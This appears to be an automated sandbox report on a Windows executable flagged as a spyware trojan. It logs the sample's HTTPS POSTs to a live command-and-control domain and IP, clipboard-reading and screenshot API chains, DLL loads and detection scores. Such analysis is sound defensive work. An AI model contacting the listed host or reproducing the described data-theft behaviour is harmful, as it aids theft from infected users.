HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: cultureddirtys.click

Source: mWAik6b.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: mWAik6b.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertEVCodeSigningCA-SHA2.crt0
Source: mWAik6b.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertHighAssuranceEVRootCA.crt0
Source: mWAik6b.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: mWAik6b.exe	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: mWAik6b.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: mWAik6b.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: mWAik6b.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: mWAik6b.exe	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: mWAik6b.exe	String found in binary or memory: http://crl3.digicert.com/EVCodeSigningSHA2-g1.crl07
Source: mWAik6b.exe	String found in binary or memory: http://crl4.digicert.com/DigiCertHighAssuranceEVRootCA.crl0
Source: mWAik6b.exe	String found in binary or memory: http://crl4.digicert.com/EVCodeSigningSHA2-g1.crl0K
Source: mWAik6b.exe	String found in binary or memory: http://ocsp.digicert.com0A
Source: mWAik6b.exe	String found in binary or memory: http://ocsp.digicert.com0C
Source: mWAik6b.exe	String found in binary or memory: http://ocsp.digicert.com0H
Source: mWAik6b.exe	String found in binary or memory: http://ocsp.digicert.com0I
Source: mWAik6b.exe	String found in binary or memory: http://ocsp.digicert.com0X
Source: Amcache.hve.6.dr	String found in binary or memory: http://upx.sf.net
Source: mWAik6b.exe	String found in binary or memory: http://www.digicert.com/ssl-cps-repository.htm0
Source: mWAik6b.exe, 00000002.00000002.2277537994.0000000001420000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cultureddirtys.click/
Source: mWAik6b.exe, 00000002.00000002.2277537994.0000000001420000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cultureddirtys.click/C
Source: mWAik6b.exe, 00000002.00000002.2277537994.0000000001420000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cultureddirtys.click/api
Source: mWAik6b.exe, 00000002.00000002.2277309695.00000000013C8000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cultureddirtys.click/apiC
Source: mWAik6b.exe, 00000002.00000002.2277537994.0000000001420000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cultureddirtys.click/w
Source: mWAik6b.exe, 00000002.00000002.2277309695.00000000013BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cultureddirtys.click:443/apiles
Source: mWAik6b.exe, 00000002.00000002.2277309695.00000000013BA000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: https://cultureddirtys.click:443/apindows
Source: mWAik6b.exe	String found in binary or memory: https://www.digicert.com/CPS0

Source: unknown	Network traffic detected: HTTP traffic on port 49708 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49706 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49705 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49760
Source: unknown	Network traffic detected: HTTP traffic on port 49760 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49719 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49708
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49719
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49706
Source: unknown	Network traffic detected: HTTP traffic on port 49713 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 49716 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49705
Source: unknown	Network traffic detected: HTTP traffic on port 49715 -> 443
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49716
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49715
Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49713

Source: unknown	HTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49705 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49706 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49708 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49713 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49715 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49716 version: TLS 1.2
Source: unknown	HTTPS traffic detected: 172.67.150.129:443 -> 192.168.2.5:49719 version: TLS 1.2

Source: C:\Users\user\Desktop\mWAik6b.exe

Code function: 2_2_00436020 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_00436020

Source: C:\Users\user\Desktop\mWAik6b.exe

Code function: 2_2_00436020 OpenClipboard,GetClipboardData,GlobalLock,GetWindowLongW,GlobalUnlock,CloseClipboard,

2_2_00436020

Source: C:\Users\user\Desktop\mWAik6b.exe

Code function: 2_2_004361B0 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,ReleaseDC,DeleteObject,

2_2_004361B0

Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00424050	2_2_00424050
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0041095C	2_2_0041095C
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00427A00	2_2_00427A00
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0042E2AC	2_2_0042E2AC
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0041734A	2_2_0041734A
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00420BA0	2_2_00420BA0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0043D450	2_2_0043D450
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0043A5E0	2_2_0043A5E0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00440ED0	2_2_00440ED0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_004086B0	2_2_004086B0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00441750	2_2_00441750
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_004347BD	2_2_004347BD
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0041C04E	2_2_0041C04E
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0041C850	2_2_0041C850
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00414812	2_2_00414812
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_004190C0	2_2_004190C0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00405880	2_2_00405880
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0043E8A0	2_2_0043E8A0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_004038B0	2_2_004038B0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0043B0B0	2_2_0043B0B0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_004388B6	2_2_004388B6
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0043194F	2_2_0043194F
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0040E970	2_2_0040E970
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00408920	2_2_00408920
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00418927	2_2_00418927
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_004121C0	2_2_004121C0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_004091E0	2_2_004091E0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00406190	2_2_00406190
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00433992	2_2_00433992
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00432195	2_2_00432195
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0041D1A0	2_2_0041D1A0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_004201B0	2_2_004201B0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0043F1BA	2_2_0043F1BA
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00424A40	2_2_00424A40
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00434247	2_2_00434247
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00404260	2_2_00404260
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00444260	2_2_00444260
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0040AA70	2_2_0040AA70
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0043DA00	2_2_0043DA00
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00427230	2_2_00427230
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00421290	2_2_00421290
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00435B60	2_2_00435B60
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00429374	2_2_00429374
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0040CB08	2_2_0040CB08
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_004073F0	2_2_004073F0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0042FB85	2_2_0042FB85
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00404B90	2_2_00404B90
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_004403B0	2_2_004403B0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00428C48	2_2_00428C48
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0041EC00	2_2_0041EC00
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00428C2A	2_2_00428C2A
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0043943D	2_2_0043943D
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0041C4E0	2_2_0041C4E0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0041CCF0	2_2_0041CCF0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00439CF0	2_2_00439CF0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_004184F8	2_2_004184F8
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0041D490	2_2_0041D490
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00441490	2_2_00441490
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_004404B0	2_2_004404B0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0041655E	2_2_0041655E
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0041B560	2_2_0041B560
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00411507	2_2_00411507
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00405DD0	2_2_00405DD0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_004095F0	2_2_004095F0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00427D90	2_2_00427D90
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00415599	2_2_00415599
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_004405A0	2_2_004405A0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00432642	2_2_00432642
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00426E50	2_2_00426E50
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00406620	2_2_00406620
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0043AE30	2_2_0043AE30
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00440630	2_2_00440630
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_004406D0	2_2_004406D0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00402E90	2_2_00402E90
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00439F50	2_2_00439F50
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0043B757	2_2_0043B757
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00430765	2_2_00430765
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00415F0F	2_2_00415F0F
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0040AF10	2_2_0040AF10
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00429F1C	2_2_00429F1C
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00414F34	2_2_00414F34
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_004217C0	2_2_004217C0
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_004237D9	2_2_004237D9
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00427F95	2_2_00427F95

Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: String function: 00414500 appears 104 times
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: String function: 00407F30 appears 43 times

Source: C:\Users\user\Desktop\mWAik6b.exe

Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 928

Source: mWAik6b.exe

Static PE information: invalid certificate

Source: mWAik6b.exe, 00000000.00000002.2237249132.00000000034A9000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameHandler.exe0 vs mWAik6b.exe
Source: mWAik6b.exe, 00000000.00000000.2074383446.0000000000032000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameHandler.exe0 vs mWAik6b.exe
Source: mWAik6b.exe, 00000000.00000002.2236149089.00000000005CE000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs mWAik6b.exe
Source: mWAik6b.exe	Binary or memory string: OriginalFilenameHandler.exe0 vs mWAik6b.exe

Source: mWAik6b.exe

Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, LARGE_ADDRESS_AWARE, 32BIT_MACHINE

Source: mWAik6b.exe

Static PE information: Section: .idata ZLIB complexity 1.0003382863562091

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@6/5@1/1

Source: C:\Users\user\Desktop\mWAik6b.exe

Code function: 2_2_0043A5E0 RtlExpandEnvironmentStrings,CoCreateInstance,SysAllocString,CoSetProxyBlanket,SysAllocString,SysAllocString,VariantInit,VariantClear,SysFreeString,SysFreeString,SysFreeString,SysFreeString,GetVolumeInformationW,

2_2_0043A5E0

Source: C:\Users\user\Desktop\mWAik6b.exe	Mutant created: NULL
Source: C:\Windows\SysWOW64\WerFault.exe	Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2944

Source: C:\Windows\SysWOW64\WerFault.exe

File created: C:\ProgramData\Microsoft\Windows\WER\Temp\952d8487-b63a-49e7-b43f-332e0df2ddd2

Jump to behavior

Source: mWAik6b.exe

Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ

Source: mWAik6b.exe

Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 50.01%

Source: C:\Users\user\Desktop\mWAik6b.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: mWAik6b.exe	Virustotal: Detection: 29%
Source: mWAik6b.exe	ReversingLabs: Detection: 31%

Source: C:\Users\user\Desktop\mWAik6b.exe

File read: C:\Users\user\Desktop\mWAik6b.exe

Jump to behavior

Source: unknown	Process created: C:\Users\user\Desktop\mWAik6b.exe "C:\Users\user\Desktop\mWAik6b.exe"
Source: C:\Users\user\Desktop\mWAik6b.exe	Process created: C:\Users\user\Desktop\mWAik6b.exe "C:\Users\user\Desktop\mWAik6b.exe"
Source: C:\Users\user\Desktop\mWAik6b.exe	Process created: C:\Users\user\Desktop\mWAik6b.exe "C:\Users\user\Desktop\mWAik6b.exe"
Source: C:\Users\user\Desktop\mWAik6b.exe	Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2944 -s 928
Source: C:\Users\user\Desktop\mWAik6b.exe	Process created: C:\Users\user\Desktop\mWAik6b.exe "C:\Users\user\Desktop\mWAik6b.exe"	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Process created: C:\Users\user\Desktop\mWAik6b.exe "C:\Users\user\Desktop\mWAik6b.exe"	Jump to behavior

Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: mscoree.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: apphelp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: vcruntime140_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: ucrtbase_clr0400.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: windows.storage.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: wldp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: winhttp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: webio.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: mswsock.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: iphlpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: winnsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: sspicli.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: dnsapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: rasadhlp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: fwpuclnt.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: schannel.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: mskeyprotect.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: ntasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: ncrypt.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: ncryptsslp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: msasn1.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: cryptsp.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: rsaenh.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: cryptbase.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: gpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: dpapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: kernel.appcore.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: uxtheme.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: wbemcomn.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: amsi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: userenv.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: profapi.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: version.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Section loaded: ondemandconnroutehelper.dll	Jump to behavior

Source: mWAik6b.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR

Source: mWAik6b.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source: mWAik6b.exe

Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG

Source:	Binary string: System.Windows.Forms.pdb source: WER4E41.tmp.dmp.6.dr
Source:	Binary string: mscorlib.pdb source: WER4E41.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdbRSDS source: WER4E41.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdb source: WER4E41.tmp.dmp.6.dr
Source:	Binary string: mscorlib.ni.pdbRSDS source: WER4E41.tmp.dmp.6.dr
Source:	Binary string: Manjohn.pdb source: mWAik6b.exe, WER4E41.tmp.dmp.6.dr
Source:	Binary string: mscorlib.pdb$h source: WER4E41.tmp.dmp.6.dr
Source:	Binary string: System.pdb0= source: WER4E41.tmp.dmp.6.dr
Source:	Binary string: System.ni.pdb source: WER4E41.tmp.dmp.6.dr
Source:	Binary string: System.pdb source: WER4E41.tmp.dmp.6.dr

Source: mWAik6b.exe

Static PE information: 0xECEDE332 [Sun Dec 18 02:19:30 2095 UTC]

Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00448072 push ds; ret	2_2_0044807D
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_0044697D push ebx; retf	2_2_00446984
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00440340 push eax; mov dword ptr [esp], 5A656437h	2_2_00440343
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_004464EC push esi; ret	2_2_004464ED
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_004464F4 push esi; ret	2_2_004464F5
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_004464F0 push esi; ret	2_2_004464F1
Source: C:\Users\user\Desktop\mWAik6b.exe	Code function: 2_2_00445589 push eax; retf	2_2_0044559E

Source: C:\Users\user\Desktop\mWAik6b.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate			Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot			Jump to behavior

Source: C:\Users\user\Desktop\mWAik6b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Users\user\Desktop\mWAik6b.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: FAILCRITICALERRORS \| NOGPFAULTERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
Source: C:\Windows\SysWOW64\WerFault.exe	Process information set: NOOPENFILEERRORBOX	Jump to behavior
